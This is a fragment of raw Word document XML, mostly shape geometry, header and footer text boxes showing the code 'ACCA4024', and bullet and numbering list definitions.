                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 10466 2342"/>
                            <a:gd name="T1" fmla="*/ T0 w 8124"/>
                            <a:gd name="T2" fmla="+- 0 15439 15439"/>
                            <a:gd name="T3" fmla="*/ 15439 h 10"/>
                            <a:gd name="T4" fmla="+- 0 2352 2342"/>
                            <a:gd name="T5" fmla="*/ T4 w 8124"/>
                            <a:gd name="T6" fmla="+- 0 15439 15439"/>
                            <a:gd name="T7" fmla="*/ 15439 h 10"/>
                            <a:gd name="T8" fmla="+- 0 2342 2342"/>
                            <a:gd name="T9" fmla="*/ T8 w 8124"/>
                            <a:gd name="T10" fmla="+- 0 15439 15439"/>
                            <a:gd name="T11" fmla="*/ 15439 h 10"/>
                            <a:gd name="T12" fmla="+- 0 2342 2342"/>
                            <a:gd name="T13" fmla="*/ T12 w 8124"/>
                            <a:gd name="T14" fmla="+- 0 15449 15439"/>
                            <a:gd name="T15" fmla="*/ 15449 h 10"/>
                            <a:gd name="T16" fmla="+- 0 2352 2342"/>
                            <a:gd name="T17" fmla="*/ T16 w 8124"/>
                            <a:gd name="T18" fmla="+- 0 15449 15439"/>
                            <a:gd name="T19" fmla="*/ 15449 h 10"/>
                            <a:gd name="T20" fmla="+- 0 10466 2342"/>
                            <a:gd name="T21" fmla="*/ T20 w 8124"/>
                            <a:gd name="T22" fmla="+- 0 15449 15439"/>
                            <a:gd name="T23" fmla="*/ 15449 h 10"/>
                            <a:gd name="T24" fmla="+- 0 10466 2342"/>
                            <a:gd name="T25" fmla="*/ T24 w 8124"/>
                            <a:gd name="T26" fmla="+- 0 15439 15439"/>
                            <a:gd name="T27" fmla="*/ 15439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8124" h="10">
                              <a:moveTo>
                                <a:pt x="8124" y="0"/>
                              </a:move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10" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="8124" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="81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Rectangle 3"/>
                      <wps:cNvSpPr>
                        <a:spLocks noChangeArrowheads="1"/>
                      </wps:cNvSpPr>
                      <wps:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="1440" y="15789"/>
                          <a:ext cx="903" cy="72"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="94363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8E65DF" id="Group 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:771.95pt;width:451.35pt;height:21.15pt;z-index:-16031744;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1440,15439" coordsize="9027,4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">
              <v:shape id="Freeform 5" o:spid="_x0000_s1027" style="position:absolute;left:1440;top:15439;width:903;height:423;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="903,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" path="m902,l,,,10,,82,,423r902,l902,82r,-72l902,xe" fillcolor="#943634" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="902,15439;0,15439;0,15449;0,15521;0,15862;902,15862;902,15521;902,15449;902,15439" o:connectangles="0,0,0,0,0,0,0,0,0"/>
              </v:shape>
              <v:shape id="Freeform 4" o:spid="_x0000_s1028" style="position:absolute;left:2342;top:15439;width:8124;height:10;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="812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" path="m8124,l10,,,,,10r10,l8124,10r,-10xe" fillcolor="black" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8124,15439;10,15439;0,15439;0,15449;10,15449;8124,15449;8124,15439" o:connectangles="0,0,0,0,0,0,0"/>
              </v:shape>
              <v:rect id="Rectangle 3" o:spid="_x0000_s1029" style="position:absolute;left:1440;top:15789;width:903;height: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" fillcolor="#943634" stroked="f"/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285248" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73548020" wp14:editId="28F7FD81">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>1234440</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9870440</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="219710" cy="165735"/>
              <wp:effectExtent l="0" t="0" r="0" b="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7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E112FA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                          <w:pPr>
                            <w:spacing w:line="245" w:lineRule="exact"/>
                            <w:ind w:left="60"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Carlito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rlito"/>
                              <w:color w:val="FFFFFF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5480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9" type="#_x0000_t202" style="position:absolute;margin-left:97.2pt;margin-top:777.2pt;width:17.3pt;height:13.05pt;z-index:-16031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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="6EE112FA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                    <w:pPr>
                      <w:spacing w:line="245" w:lineRule="exact"/>
                      <w:ind w:left="60"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Carlito"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Carlito"/>
                        <w:color w:val="FFFFFF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2EAB03" w14:textId="77777777" w:rsidR="00280B8F" w:rsidRDefault="00280B8F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1D3134AF" w14:textId="77777777" w:rsidR="00280B8F" w:rsidRDefault="00280B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FFCA33" w14:textId="455C3726" w:rsidR="008B5358" w:rsidRDefault="006E4E04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7283712" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="316A37EB" wp14:editId="45757026">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>905510</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>449580</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5741035" cy="283845"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="18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41035" cy="283845"/>
                        <a:chOff x="1426" y="708"/>
                        <a:chExt cx="9041" cy="447"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="20" name="Freeform 9"/>
                      <wps:cNvSpPr>
                        <a:spLocks/>
                      </wps:cNvSpPr>
                      <wps:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="1425" y="708"/>
                          <a:ext cx="2722" cy="447"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 4147 1426"/>
                            <a:gd name="T1" fmla="*/ T0 w 2722"/>
                            <a:gd name="T2" fmla="+- 0 708 708"/>
                            <a:gd name="T3" fmla="*/ 708 h 447"/>
                            <a:gd name="T4" fmla="+- 0 1440 1426"/>
                            <a:gd name="T5" fmla="*/ T4 w 2722"/>
                            <a:gd name="T6" fmla="+- 0 708 708"/>
                            <a:gd name="T7" fmla="*/ 708 h 447"/>
                            <a:gd name="T8" fmla="+- 0 1440 1426"/>
                            <a:gd name="T9" fmla="*/ T8 w 2722"/>
                            <a:gd name="T10" fmla="+- 0 780 708"/>
                            <a:gd name="T11" fmla="*/ 780 h 447"/>
                            <a:gd name="T12" fmla="+- 0 1440 1426"/>
                            <a:gd name="T13" fmla="*/ T12 w 2722"/>
                            <a:gd name="T14" fmla="+- 0 1073 708"/>
                            <a:gd name="T15" fmla="*/ 1073 h 447"/>
                            <a:gd name="T16" fmla="+- 0 1440 1426"/>
                            <a:gd name="T17" fmla="*/ T16 w 2722"/>
                            <a:gd name="T18" fmla="+- 0 1145 708"/>
                            <a:gd name="T19" fmla="*/ 1145 h 447"/>
                            <a:gd name="T20" fmla="+- 0 1426 1426"/>
                            <a:gd name="T21" fmla="*/ T20 w 2722"/>
                            <a:gd name="T22" fmla="+- 0 1145 708"/>
                            <a:gd name="T23" fmla="*/ 1145 h 447"/>
                            <a:gd name="T24" fmla="+- 0 1426 1426"/>
                            <a:gd name="T25" fmla="*/ T24 w 2722"/>
                            <a:gd name="T26" fmla="+- 0 1154 708"/>
                            <a:gd name="T27" fmla="*/ 1154 h 447"/>
                            <a:gd name="T28" fmla="+- 0 4147 1426"/>
                            <a:gd name="T29" fmla="*/ T28 w 2722"/>
                            <a:gd name="T30" fmla="+- 0 1154 708"/>
                            <a:gd name="T31" fmla="*/ 1154 h 447"/>
                            <a:gd name="T32" fmla="+- 0 4147 1426"/>
                            <a:gd name="T33" fmla="*/ T32 w 2722"/>
                            <a:gd name="T34" fmla="+- 0 1145 708"/>
                            <a:gd name="T35" fmla="*/ 1145 h 447"/>
                            <a:gd name="T36" fmla="+- 0 4147 1426"/>
                            <a:gd name="T37" fmla="*/ T36 w 2722"/>
                            <a:gd name="T38" fmla="+- 0 1073 708"/>
                            <a:gd name="T39" fmla="*/ 1073 h 447"/>
                            <a:gd name="T40" fmla="+- 0 4147 1426"/>
                            <a:gd name="T41" fmla="*/ T40 w 2722"/>
                            <a:gd name="T42" fmla="+- 0 780 708"/>
                            <a:gd name="T43" fmla="*/ 780 h 447"/>
                            <a:gd name="T44" fmla="+- 0 4147 1426"/>
                            <a:gd name="T45" fmla="*/ T44 w 2722"/>
                            <a:gd name="T46" fmla="+- 0 708 708"/>
                            <a:gd name="T47" fmla="*/ 708 h 44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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="2722" h="447">
                              <a:moveTo>
                                <a:pt x="2721" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="14" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="14" y="72"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="14" y="365"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="14" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="446"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2721" y="446"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2721" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2721" y="365"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2721" y="72"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="27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4363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" name="AutoShape 8"/>
                      <wps:cNvSpPr>
                        <a:spLocks/>
                      </wps:cNvSpPr>
                      <wps:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="4132" y="1144"/>
                          <a:ext cx="6334" cy="10"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 4142 4133"/>
                            <a:gd name="T1" fmla="*/ T0 w 6334"/>
                            <a:gd name="T2" fmla="+- 0 1145 1145"/>
                            <a:gd name="T3" fmla="*/ 1145 h 10"/>
                            <a:gd name="T4" fmla="+- 0 4133 4133"/>
                            <a:gd name="T5" fmla="*/ T4 w 6334"/>
                            <a:gd name="T6" fmla="+- 0 1145 1145"/>
                            <a:gd name="T7" fmla="*/ 1145 h 10"/>
                            <a:gd name="T8" fmla="+- 0 4133 4133"/>
                            <a:gd name="T9" fmla="*/ T8 w 6334"/>
                            <a:gd name="T10" fmla="+- 0 1154 1145"/>
                            <a:gd name="T11" fmla="*/ 1154 h 10"/>
                            <a:gd name="T12" fmla="+- 0 4142 4133"/>
                            <a:gd name="T13" fmla="*/ T12 w 6334"/>
                            <a:gd name="T14" fmla="+- 0 1154 1145"/>
                            <a:gd name="T15" fmla="*/ 1154 h 10"/>
                            <a:gd name="T16" fmla="+- 0 4142 4133"/>
                            <a:gd name="T17" fmla="*/ T16 w 6334"/>
                            <a:gd name="T18" fmla="+- 0 1145 1145"/>
                            <a:gd name="T19" fmla="*/ 1145 h 10"/>
                            <a:gd name="T20" fmla="+- 0 10466 4133"/>
                            <a:gd name="T21" fmla="*/ T20 w 6334"/>
                            <a:gd name="T22" fmla="+- 0 1145 1145"/>
                            <a:gd name="T23" fmla="*/ 1145 h 10"/>
                            <a:gd name="T24" fmla="+- 0 4142 4133"/>
                            <a:gd name="T25" fmla="*/ T24 w 6334"/>
                            <a:gd name="T26" fmla="+- 0 1145 1145"/>
                            <a:gd name="T27" fmla="*/ 1145 h 10"/>
                            <a:gd name="T28" fmla="+- 0 4142 4133"/>
                            <a:gd name="T29" fmla="*/ T28 w 6334"/>
                            <a:gd name="T30" fmla="+- 0 1154 1145"/>
                            <a:gd name="T31" fmla="*/ 1154 h 10"/>
                            <a:gd name="T32" fmla="+- 0 10466 4133"/>
                            <a:gd name="T33" fmla="*/ T32 w 6334"/>
                            <a:gd name="T34" fmla="+- 0 1154 1145"/>
                            <a:gd name="T35" fmla="*/ 1154 h 10"/>
                            <a:gd name="T36" fmla="+- 0 10466 4133"/>
                            <a:gd name="T37" fmla="*/ T36 w 6334"/>
                            <a:gd name="T38" fmla="+- 0 1145 1145"/>
                            <a:gd name="T39" fmla="*/ 1145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6334" h="10">
                              <a:moveTo>
                                <a:pt x="9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9" y="9"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9" y="0"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="6333" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="9" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9" y="9"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6333" y="9"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="63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C78FBEB" id="Group 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:71.3pt;margin-top:35.4pt;width:452.05pt;height:22.35pt;z-index:-16032768;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1426,708" coordsize="9041,4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">
              <v:shape id="Freeform 9" o:spid="_x0000_s1027" style="position:absolute;left:1425;top:708;width:2722;height:447;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2722,4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" path="m2721,l14,r,72l14,365r,72l,437r,9l2721,446r,-9l2721,365r,-293l2721,xe" fillcolor="#943634" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2721,708;14,708;14,780;14,1073;14,1145;0,1145;0,1154;2721,1154;2721,1145;2721,1073;2721,780;2721,708" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
              </v:shape>
              <v:shape id="AutoShape 8" o:spid="_x0000_s1028" style="position:absolute;left:4132;top:1144;width:6334;height:10;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="633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" path="m9,l,,,9r9,l9,xm6333,l9,r,9l6333,9r,-9xe" fillcolor="black" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="9,1145;0,1145;0,1154;9,1154;9,1145;6333,1145;9,1145;9,1154;6333,1154;6333,1145" o:connectangles="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284224" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52F00624" wp14:editId="7FCCA5E4">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>1464310</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>525145</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="621030" cy="165735"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1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103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CA092C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                          <w:pPr>
                            <w:spacing w:line="245" w:lineRule="exact"/>
                            <w:ind w:left="20"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Carlito"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Carlito"/>
                              <w:color w:val="FFFFFF"/>
                            </w:rPr>
                            <w:t>ACCA4024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F00624" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="_x0000_s1048" type="#_x0000_t202" style="position:absolute;margin-left:115.3pt;margin-top:41.35pt;width:48.9pt;height:13.05pt;z-index:-16032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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="35CA092C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                    <w:pPr>
                      <w:spacing w:line="245" w:lineRule="exact"/>
                      <w:ind w:left="20"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Carlito"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Carlito"/>
                        <w:color w:val="FFFFFF"/>
                      </w:rPr>
                      <w:t>ACCA4024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D37C74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71B259C4"/>
    <w:lvl w:ilvl="0" w:tplc="2A6AB03C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360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1" w:tplc="73FE529A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4F9EE18A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3000" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
        <w:w w:val="100"/>
        <w:position w:val="3"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1ADEFB72">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4038" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E4E4B168">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5076" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7B8AC20E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6114" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4AE463EE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7153" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0924F4C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8191" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5E649DEC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9229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44D615A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51B604AC"/>
    <w:lvl w:ilvl="0" w:tplc="7ECCBFBC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="150CF60C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2534" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E56276B0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3509" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A3928506">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4483" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A0E29104">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5458" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E244D722">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EAEC2200">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7407" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="CAD606A8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8382" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DD3E25C8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9357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74C63432"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5254D46A"/>
    <w:lvl w:ilvl="0" w:tplc="6D1C3EF4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560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65420108">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2534" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FDAEB976">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3509" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="83D4EAFE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4483" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9ED4B70E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5458" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2F2032EE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="402E7E02">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7407" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7DC6AFBE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8382" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="ADAC533C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9357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7BBB13A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE50A5F6"/>
    <w:lvl w:ilvl="0" w:tplc="6510B5F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2280" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:spacing w:val="-1"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="115A23B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3000" w:hanging="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:spacing w:val="-1"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
